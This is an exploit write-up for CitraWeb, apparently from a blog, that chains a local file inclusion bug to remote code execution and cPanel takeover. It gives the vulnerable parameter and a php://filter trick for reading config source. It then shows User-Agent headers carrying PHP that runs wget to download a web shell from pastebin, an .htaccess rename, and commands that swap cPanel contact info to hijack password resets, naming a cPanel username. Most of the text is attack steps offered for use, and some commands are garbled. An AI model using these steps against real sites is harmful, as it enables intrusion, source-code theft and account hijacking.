CitraWeb Local File Inclusion to Remote Code Execution

# Exploit Title : CitraWeb Local File Inclusion to Remote Code Execution and get Cpanel
# Date : 2019.06.03
# Exploit Author : 4nzeL4
# Website : https://citra.web.id/en/project.html




here I will practice some techniques for utilizing LFI bugs besides
for RCE, that is, we can steal Source Code like Config and others
so please don't skipp this video unless you are a master wkwk

[+] LFI exploits:
TARGET/[PATH]/system/ajax/?file=

[+] Get file config with LFI
php://filter/convert.base64-encode/resource=file

[+] Exploit RCE:

Step 1.
Mozilla / 5.0 (Windows NT 6.1; rv: 27.0) Gecko / 20100101 Firefox / 27.0 <? = System ('wget https://pastebin.com/raw/yYJVNJqp -O x.php; ls -la')?>

// make sure the x.php file already exists

step 2.
Mozilla / 5.0 (Windows NT 6.1; rv: 27.0) Gecko / 20100101 Firefox / 27.0 <? = System ('mv .htaccess .htacces')?>
// now we access the file x.php
// yups succeeded
// I will try to enter the code
// next we will get Get cpanel access


[+] Get Cpanel with RCE:

enter command

# wget https://pastebin.com/raw/HcwPV8hd -O.contactemail
# mv. contactemail ../
# mv ../.cpanel/contactinfo ../.cpanel/contactinfo2
// admeur07 this is the username for cpanel
// https://pastebin.com/raw/HcwPV8hd > the contents are e-mail to receive the code
Previous
Next Post »